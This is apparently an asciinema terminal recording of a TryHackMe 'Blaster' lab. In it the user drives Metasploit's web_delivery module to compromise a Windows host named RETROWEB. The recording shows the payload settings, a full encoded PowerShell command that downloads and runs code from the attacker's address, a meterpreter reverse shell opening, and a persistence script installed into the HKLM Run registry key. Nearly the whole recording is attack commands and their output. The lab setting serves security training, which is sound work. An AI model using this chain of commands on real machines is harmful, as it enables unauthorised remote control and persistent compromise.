{"version": 2, "width": 205, "height": 55, "timestamp": 1596505854, "idle_time_limit": 2.5, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.006726, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[c\u001b[1337n\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;55r\u001b[1;32H"]
[0.007793, "o", "\u001b[?25l\u001b[31m\u001b[1m\u001b[Hkali@kali\u001b(B\u001b[m:\u001b[34m\u001b[1m~/TryHackMe/blaster\u001b(B\u001b[m$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[THM] 0:OpenVPN  1:notes  2:metasploit* 3:rdp-                                                                                                                                         \"kali\" 21:50 03-Aug-20\u001b(B\u001b[m\u001b[1;32H\u001b[?12l\u001b[?25h\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;55r\u001b[1;32H"]
[0.008158, "o", "\u001b[?25l\u001b[31m\u001b[1m\u001b[Hkali@kali\u001b(B\u001b[m:\u001b[34m\u001b[1m~/TryHackMe/blaster\u001b(B\u001b[m$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[THM] 0:OpenVPN  1:notes  2:metasploit* 3:rdp-                                                                                                                                         \"kali\" 21:50 03-Aug-20\u001b(B\u001b[m\u001b[1;32H\u001b[?12l\u001b[?25h"]
[1.070179, "o", "\u001b[1;54r\u001b[2;54r\u001b[53S\u001b[1;1H\u001b[K\u001b[31m\u001b[1mkali@kali\u001b(B\u001b[m:\u001b[34m\u001b[1m~/TryHackMe/blaster\u001b(B\u001b[m$ \u001b[1;55r\u001b[1;32H"]
[1.273938, "o", "\u001b[1;54r\u001b[2;54r\u001b[53S\u001b[1;1H\u001b[K\u001b[31m\u001b[1mkali@kali\u001b(B\u001b[m:\u001b[34m\u001b[1m~/TryHackMe/blaster\u001b(B\u001b[m$ \u001b[1;55r\u001b[1;32H"]
[1.486196, "o", "\u001b[1;54r\u001b[2;54r\u001b[53S\u001b[1;1H\u001b[K\u001b[31m\u001b[1mkali@kali\u001b(B\u001b[m:\u001b[34m\u001b[1m~/TryHackMe/blaster\u001b(B\u001b[m$ \u001b[1;55r\u001b[1;32H"]
[2.099236, "o", "c"]
[3.369556, "o", "\b\u001b[K"]
[3.665414, "o", "l"]
[3.73418, "o", "s"]
[3.794993, "o", "\r\n"]
[3.79764, "o", "iis-directory-list.txt  nmap-initial.txt  \u001b[34m\u001b[1mwww\r\n\u001b(B\u001b[m"]
[3.798041, "o", "\u001b[31m\u001b[1mkali@kali\u001b(B\u001b[m:\u001b[34m\u001b[1m~/TryHackMe/blaster\u001b(B\u001b[m$ "]
[4.315862, "o", "\u001b[1;54r\u001b[2;54r\u001b[53S\u001b[1;1H\u001b[K\u001b[31m\u001b[1mkali@kali\u001b(B\u001b[m:\u001b[34m\u001b[1m~/TryHackMe/blaster\u001b(B\u001b[m$ \u001b[1;55r\u001b[1;32H"]
[6.395481, "o", "m"]
[6.511535, "o", "s"]
[6.712995, "o", "f"]
[6.866633, "o", "c"]
[7.154059, "o", "o"]
[7.237186, "o", "n"]
[7.459392, "o", "s"]
[7.881698, "o", "o"]
[8.048501, "o", "l"]
[8.139875, "o", "e"]
[8.275329, "o", "\r\n"]
[11.149102, "o", "[*] Starting the Metasploit Framework console.../\r"]
[11.250667, "o", "[*] Starting the Metasploit Framework console...-\r"]
[11.352226, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[11.569474, "o", "[*] starting the Metasploit Framework console...|\r"]
[11.774784, "o", "[*] STarting the Metasploit Framework console.../\r"]
[11.875926, "o", "[*] StArting the Metasploit Framework console...-\r"]
[11.976305, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[12.076719, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[12.177728, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[12.278571, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[12.379171, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[12.479441, "o", "[*] Starting the Metasploit Framework console...|\r"]
[12.580955, "o", "[*] Starting The Metasploit Framework console.../\r"]
[12.682003, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[12.78317, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[12.884138, "o", "[*] Starting the Metasploit Framework console...|\r"]
[12.986295, "o", "[*] Starting the metasploit Framework console.../\r"]
[13.089209, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[13.194793, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[13.301099, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[13.403084, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[13.549556, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[13.654149, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[13.754644, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[13.855084, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[13.953708, "o", "                                                  \r\n"]
[13.961636, "o", "\u001b[31m               .;lxO0KXXXK0Oxl:.\r\n           ,o0WMMMMMMMMMMMMMMMMMMKd,\r\n        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,\r\n      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:\r\n    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,\r\n   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo\r\n  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk\r\n oMMMMMMMMMMx.                    dMMMMMMMMMMx\r\n.WMMMMMMMMM:                       :MMMMMMMMMM,\r\nxMMMMMMMMMo                         lMMMMMMMMMO\r\nNMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;\r\nMMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:\r\nNMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:\r\nxMMMMMMMMMd                        ,0MMMMMMMMMMK;\r\n.WMMMMMMMMMc                         'OMMMMMM0,\r\n lMMMMMMMMMMk.                         .kMMO'\r\n  dMMMMMMMMMMWd'                         ..\r\n   cWMMMMMMMMMMMNxc'.\u001b[37m                ##########\r\n\u001b[31m    .0MMMMMMMMMMMMMMMMWc\u001b[37m            #+#    #+#\r\n\u001b[31m      ;0MMMMMMMMMMMMMMMo.\u001b[37m          +:+\r\n\u001b[31m        .dNMMMMMMMMMMMMo\u001b[39m          +\u001b[37m#+\u001b[39m+:++"]
[13.961699, "o", "#+\r\n\u001b[31m           'oOWMMMMMMMMo\u001b[39m                +:+\r\n\u001b[31m               .,cdkO0K;\u001b[39m        :+:    :+:                                \r\n                                :::::::+:\r\n                      \u001b[37mMetasploit\u001b[29;1H\u001b[39m       =[ \u001b[33mmetasploit v5.0.100-dev\u001b[39m                         ]\r\n+ -- --=[ 2046 exploits - 1107 auxiliary - 344 post       ]\r\n+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=[ 7 evasion                                       ]\u001b[34;1HMetasploit tip: Search can apply complex filters such as \u001b[32msearch cve:2009 type:exploit\u001b[39m, see all the filters with \u001b[32mhelp search\u001b[36;1H\u001b(B\u001b[m"]
[13.96223, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Starting persistent handler(s)...\r\n"]
[13.988718, "o", "\u001b[4mmsf5\u001b(B\u001b[m > "]
[15.007752, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[55;1H[THM] 0:OpenVPN  1:notes  2:metasploit* 3:rdp-                                                                                                                                         \"kali\" 21:51 03-Aug-20\u001b(B\u001b[m\u001b[37;8H\u001b[?12l\u001b[?25h"]
[15.403357, "o", "s"]
[15.732829, "o", "e"]
[15.845736, "o", "a"]
[15.936746, "o", "r"]
[16.040829, "o", "c"]
[16.133135, "o", "h"]
[16.358932, "o", " "]
[18.242578, "o", "w"]
[18.290427, "o", "e"]
[18.370359, "o", "b"]
[18.612192, "o", "_"]
[18.758822, "o", "d"]
[18.845367, "o", "e"]
[18.904942, "o", "v"]
[19.026074, "o", "l"]
[19.10118, "o", "i"]
[19.252964, "o", "e"]
[19.324503, "o", "r"]
[19.540487, "o", "y"]
[19.910742, "o", "\b\u001b[K"]
[20.065357, "o", "\b\u001b[K"]
[20.215618, "o", "\b\u001b[K"]
[20.35204, "o", "\b\u001b[K"]
[20.491425, "o", "\b\u001b[K"]
[20.63658, "o", "\b\u001b[K"]
[21.02479, "o", "l"]
[21.207239, "o", "i"]
[21.319018, "o", "v"]
[21.415095, "o", "e"]
[21.490878, "o", "r"]
[21.685636, "o", "y"]
[21.915221, "o", "\r\n"]
[21.955925, "o", "\r\nMatching Modules\r\n================\u001b[42;1H   #  Name                                                        Disclosure Date  Rank       Check  Description\r\n   -  ----                                                        ---------------  ----       -----  -----------\r\n   0  exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       \u001b[32mexcellent\u001b[39m  Yes    PostgreSQL COPY FROM PROGRAM Command Execution\r\n   1  exploit/multi/script/\u001b[45mweb_delivery\u001b[49m                           2013-07-19       manual     No     Script Web Delivery\u001b[48;1H"]
[21.956554, "o", "Interact with a module by name or index, for example \u001b[32muse 1\u001b[39m or \u001b[32muse exploit/multi/script/web_delivery\u001b[50;1H\u001b(B\u001b[m"]
[21.968297, "o", "\u001b[4mmsf5\u001b(B\u001b[m > "]
[23.00079, "o", "u"]
[23.138878, "o", "s"]
[23.310612, "o", "e"]
[23.460385, "o", " "]
[23.65594, "o", "1"]
[24.869357, "o", "\r\n"]
[24.892699, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Using configured payload python/meterpreter/reverse_tcp\r\n"]
[24.900839, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[26.117645, "o", "s"]
[26.239058, "o", "h"]
[26.387034, "o", "o"]
[26.658858, "o", "w"]
[27.012149, "o", " "]
[28.347119, "o", "\u001b[1;54r\u001b[2;54r\u001b[53S\u001b[1;1H\u001b[K\u001b[1;55r\u001b[1;1H\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > show "]
[28.98001, "o", "o"]
[29.143103, "o", "p"]
[29.251849, "o", "t"]
[29.363086, "o", "i"]
[29.427552, "o", "o"]
[29.507093, "o", "n"]
[29.631167, "o", "s"]
[29.875731, "o", "\r\n"]
[29.880229, "o", "\r\nModule options (exploit/multi/script/web_delivery):\u001b[5;1H   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.\r\n   SRVPORT  8080             yes       The local port to listen on.\r\n   SSL      false            no        Negotiate SSL for incoming connections\r\n   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)\r\n   URIPATH                   no        The URI to use for this exploit (default is random)\u001b[13;1H"]
[29.889122, "o", "\r\nPayload options (python/meterpreter/reverse_tcp):\u001b[16;1H   Name   Current Setting  Required  Description\r\n   ----   ---------------  --------  -----------\r\n   LHOST                   yes       The listen address (an interface may be specified)\r\n   LPORT  4444             yes       The listen port\u001b[21;1H"]
[29.889868, "o", "\r\nExploit target:\u001b[24;1H   Id  Name\r\n   --  ----\r\n   0   Python\u001b[29;1H"]
[29.898062, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[31.27674, "o", "s"]
[31.341273, "o", "e"]
[31.416306, "o", "t"]
[31.508308, "o", " "]
[31.769552, "o", "L"]
[32.269139, "o", "H"]
[32.313012, "o", "O"]
[32.393294, "o", "S"]
[32.465422, "o", "T"]
[32.684088, "o", " "]
[32.749807, "o", "t"]
[32.87797, "o", "u"]
[32.889961, "o", "n"]
[33.360976, "o", "0"]
[34.153193, "o", "\r\n"]
[34.156802, "o", "LHOST => 10.4.10.122\r\n"]
[34.165454, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[34.923348, "o", "s"]
[34.971481, "o", "e"]
[35.022526, "o", "t"]
[36.07703, "o", " "]
[37.399134, "o", "T"]
[37.582933, "o", "A"]
[37.639086, "o", "R"]
[37.8306, "o", "G"]
[37.931083, "o", "E"]
[38.031112, "o", "T"]
[38.183623, "o", " "]
[38.363376, "o", "2"]
[38.822777, "o", "\r\n"]
[38.826252, "o", "TARGET => 2\r\n"]
[38.834509, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[40.385487, "o", "s"]
[40.432629, "o", "e"]
[40.46982, "o", "t"]
[40.524529, "o", " "]
[40.690563, "o", "p"]
[40.743169, "o", "a"]
[40.867421, "o", "y"]
[40.959855, "o", "l"]
[41.108471, "o", "o"]
[41.158758, "o", "a"]
[41.226847, "o", "d"]
[41.334398, "o", " "]
[41.582537, "o", "w"]
[41.675058, "o", "i"]
[41.723233, "o", "n"]
[41.795581, "o", "d"]
[41.898785, "o", "o"]
[41.980093, "o", "w"]
[42.156985, "o", "s"]
[42.285391, "o", "/"]
[43.008173, "o", "m"]
[43.051315, "o", "e"]
[43.194213, "o", "t"]
[43.346925, "o", "e"]
[43.431247, "o", "r"]
[43.712616, "o", "p"]
[43.77667, "o", "r"]
[43.840412, "o", "e"]
[43.976466, "o", "t"]
[44.106296, "o", "e"]
[44.163875, "o", "r"]
[44.226301, "o", "/"]
[44.385131, "o", "r"]
[44.456919, "o", "e"]
[44.565418, "o", "v"]
[44.680984, "o", "e"]
[44.802248, "o", "r"]
[44.976276, "o", "s"]
[45.032238, "o", "e"]
[45.31483, "o", "_"]
[45.573819, "o", "h"]
[45.670349, "o", "t"]
[46.569641, "o", "\u0007"]
[46.569839, "o", "tp"]
[46.575205, "o", "t"]
[46.847807, "o", "p"]
[47.283435, "o", "\b\u001b[K"]
[47.407534, "o", "\b\u001b[K"]
[47.487473, "o", "s"]
[48.044548, "o", "\r\n"]
[48.065517, "o", "payload => windows/meterpreter/reverse_https\r\n"]
[48.072533, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[48.804637, "o", "\u001b[1;54r\u001b[2;54r\u001b[53S\u001b[1;1H\u001b[K\u001b[1;55r\u001b[1;1H"]
[48.804787, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[49.0782, "o", "s"]
[49.170219, "o", "h"]
[49.242401, "o", "o"]
[49.330215, "o", "w"]
[49.378576, "o", " "]
[49.519221, "o", "o"]
[49.591559, "o", "p"]
[49.663446, "o", "t"]
[49.775437, "o", "i"]
[49.832035, "o", "o"]
[49.919256, "o", "n"]
[50.007993, "o", "s"]
[50.163946, "o", "\r\n"]
[50.168852, "o", "\r\nModule options (exploit/multi/script/web_delivery):\u001b[5;1H   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.\r\n   SRVPORT  8080             yes       The local port to listen on.\r\n   SSL      false            no        Negotiate SSL for incoming connections\r\n   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)\r\n   URIPATH                   no        The URI to use for this exploit (default is random)\u001b[13;1H"]
[50.182643, "o", "\r\nPayload options (windows/meterpreter/reverse_https):\u001b[16;1H   Name      Current Setting  Required  Description\r\n   ----      ---------------  --------  -----------\r\n   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n   LHOST     10.4.10.122      yes       The local listener hostname\r\n   LPORT     4444             yes       The local listener port\r\n   LURI                       no        The HTTP Path\u001b[23;1H"]
[50.183509, "o", "\r\nExploit target:\u001b[26;1H   Id  Name\r\n   --  ----\r\n   2   PSH\u001b[31;1H"]
[50.191407, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[54.749586, "o", "r"]
[54.806051, "o", "u"]
[54.858948, "o", "n"]
[55.027023, "o", " "]
[55.28823, "o", "-"]
[55.546482, "o", "j"]
[56.35482, "o", "\r\n"]
[56.534982, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Exploit running as background job 0.\r\n"]
[56.53529, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Exploit completed, but no session was created.\r\n"]
[56.541626, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[57.214621, "o", "\r\n"]
[57.215035, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Started HTTPS reverse handler on https://10.4.10.122:4444"]
[57.215169, "o", "\r\n"]
[57.217787, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Using URL: http://0.0.0.0:8080/mO4WCEo5MN\r\n"]
[57.218571, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Local IP: http://172.16.200.130:8080/mO4WCEo5MN\r\n"]
[57.218782, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Server started."]
[57.21885, "o", "\r\n"]
[57.219892, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Run the following command on the target machine:\r\n"]
[57.221106, "o", "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABVAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFUALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABVAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4ANAAuADEAMAAuADEAMgAyADoAOAAwADgAMAAvAG0ATwA0AFcAQwBFAG8ANQBNAE4ALwA1AE4AcQBPAFAAcABVAFk"]
[57.221153, "o", "AJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADQALgAxADAALgAxADIAMgA6ADgAMAA4ADAALwBtAE8ANABXAEMARQBvADUATQBOACcAKQApADsA\r\n"]
[71.956695, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m 10.10.246.125    web_delivery - Delivering AMSI Bypass (939 bytes)\r\n"]
[72.36353, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m 10.10.246.125    web_delivery - Delivering Payload (2180 bytes)\r\n"]
[75.011097, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[55d[THM] 0:OpenVPN  1:notes  2:metasploit* 3:rdp-                                                                                                                                         \"kali\" 21:52 03-Aug-20\u001b(B\u001b[m\u001b[49;1H\u001b[?12l\u001b[?25h"]
[77.08687, "o", "\u001b[1;54r\u001b[2;54r\u001b[53S\u001b[1;1H\u001b[K\u001b[1;55r\u001b[1;1H"]
[77.087178, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[82.336117, "o", "w"]
[82.396749, "o", "a"]
[82.525326, "o", "i"]
[82.620713, "o", "t"]
[82.750223, "o", " "]
[82.886567, "o", "f"]
[82.978186, "o", "o"]
[83.059649, "o", "r"]
[83.127221, "o", " "]
[83.220463, "o", "t"]
[83.291835, "o", "h"]
[83.431087, "o", "e"]
[83.561874, "o", " "]
[84.810287, "o", "m"]
[84.858205, "o", "e"]
[84.993215, "o", "t"]
[85.12062, "o", "e"]
[85.200794, "o", "r"]
[85.304222, "o", "p"]
[85.83299, "o", "r"]
[85.901656, "o", "e"]
[86.027007, "o", "t"]
[86.100669, "o", "e"]
[86.17495, "o", "r"]
[86.254383, "o", " "]
[86.346498, "o", "t"]
[86.423573, "o", "o"]
[86.446428, "o", " "]
[86.590425, "o", "s"]
[86.681592, "o", "p"]
[86.786209, "o", "a"]
[86.83811, "o", "w"]
[86.942133, "o", "n"]
[89.656853, "o", "\u001b[33D"]
[90.092734, "o", "\u001b[K"]
[90.977729, "o", "j"]
[91.128698, "o", "o"]
[91.203716, "o", "b"]
[91.38927, "o", "s"]
[91.607546, "o", "\r\n"]
[91.612131, "o", "\r\nJobs\r\n====\u001b[6;1H  Id  Name                                Payload                            Payload opts\r\n  --  ----                                -------                            ------------\r\n  0   Exploit: multi/script/web_delivery  windows/meterpreter/reverse_https  https://10.4.10.122:4444\u001b[10;1H"]
[91.621207, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[95.930616, "o", "\r\n"]
[95.931083, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m https://10.4.10.122:4444 handling request from 10.10.246.125; (UUID: nzqtbf89) Staging x86 payload (177241 bytes) ...\r\n"]
[96.137421, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Meterpreter session 1 opened (10.4.10.122:4444 -> 10.10.246.125:49882) at 2020-08-03 21:52:30 -0400\r\n"]
[102.37851, "o", "\r\n"]
[102.389678, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[103.173472, "o", "s"]
[103.253798, "o", "e"]
[103.469625, "o", "s"]
[103.602108, "o", "s"]
[103.670552, "o", "i"]
[103.741619, "o", "o"]
[103.798705, "o", "n"]
[103.89443, "o", "s"]
[104.661887, "o", "\r\n"]
[104.665613, "o", "\r\n"]
[104.665956, "o", "Active sessions\r\n===============\u001b[19;1H  Id  Name  Type                     Information  Connection\r\n  --  ----  ----                     -----------  ----------\r\n  1         meterpreter x86/windows               10.4.10.122:4444 -> 10.10.246.125:49882 (10.10.246.125)\r\n"]
[104.666621, "o", "\r\n"]
[104.674563, "o", "\u001b[4mmsf5\u001b(B\u001b[m exploit(\u001b[31m\u001b[1mmulti/script/web_delivery\u001b(B\u001b[m) > "]
[105.417077, "o", "s"]
[105.486671, "o", "e"]
[105.657993, "o", "s"]
[105.806245, "o", "s"]
[105.921549, "o", "i"]
[105.981967, "o", "o"]
[106.080836, "o", "n"]
[106.454448, "o", "s"]
[106.586905, "o", " "]
[107.290792, "o", "-"]
[107.359248, "o", "i"]
[107.476296, "o", " "]
[107.633354, "o", "1"]
[107.995426, "o", "\r\n"]
[107.998718, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Starting interaction with 1...\u001b[26;1H"]
[108.007424, "o", "\u001b[4mmeterpreter\u001b(B\u001b[m > "]
[112.041332, "o", "h"]
[112.129405, "o", "e"]
[112.234088, "o", "l"]
[112.290363, "o", "p"]
[112.531704, "o", "\r\n"]
[112.574285, "o", "\u001b[4mmeterpreter\u001b(B\u001b[m > "]
[114.14435, "o", "s"]
[114.328393, "o", "y"]
[114.494059, "o", "s"]
[114.559045, "o", "i"]
[114.614116, "o", "n"]
[114.695194, "o", "f"]
[114.795151, "o", "o"]
[115.443978, "o", "\r\n"]
[116.218033, "o", "Computer        : RETROWEB\r\n"]
[116.218227, "o", "OS              : Windows 2016+ (10.0 Build 14393).\r\nArchitecture    : x64"]
[116.21874, "o", "\r\nSystem Language : en_US\r\nDomain          : WORKGROUP\r\n"]
[116.219207, "o", "Logged On Users : 1\r\nMeterpreter     : x86/windows\r\n"]
[116.227319, "o", "\u001b[4mmeterpreter\u001b(B\u001b[m > "]
[120.547617, "o", "r"]
[120.643291, "o", "u"]
[120.691184, "o", "n"]
[120.7948, "o", " "]
[121.016792, "o", "p"]
[121.122056, "o", "e"]
[121.185231, "o", "r"]
[121.320123, "o", "s"]
[121.418669, "o", "i"]
[121.49134, "o", "s"]
[121.631145, "o", "t"]
[121.703946, "o", "e"]
[121.78061, "o", "n"]
[121.87324, "o", "c"]
[121.941377, "o", "e"]
[122.05717, "o", " "]
[122.192382, "o", "-"]
[122.443785, "o", "X"]
[122.888134, "o", "\r\r\n"]
[123.191904, "o", "\r\n"]
[123.191963, "o", "\u001b[33m\u001b[1m[!]\u001b(B\u001b[m Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.\r\n"]
[123.192222, "o", "\u001b[33m\u001b[1m[!]\u001b(B\u001b[m Example: run exploit/windows/local/persistence OPTION=value [...]\r\n"]
[123.613195, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Running Persistence Script\r\n"]
[123.614337, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Resource file for cleanup created at /home/kali/.msf4/logs/persistence/RETROWEB_20200803.5258/RETROWEB_20200803.5258.rc\r\n"]
[123.625195, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.200.130 LPORT=4444\r\n"]
[123.869675, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Persistent agent script is 99702 bytes long\r\n"]
[129.067834, "o", "\u001b[32m\u001b[1m[+]\u001b(B\u001b[m Persistent Script written to C:\\Windows\\TEMP\\BbVWBoMQ.vbs\r\n"]
[129.068433, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Executing script C:\\Windows\\TEMP\\BbVWBoMQ.vbs\r\n"]
[130.919637, "o", "\u001b[32m\u001b[1m[+]\u001b(B\u001b[m Agent executed with PID 4376\r\n"]
[130.920365, "o", "\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Installing into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dNoRLFeKSa\r\n"]
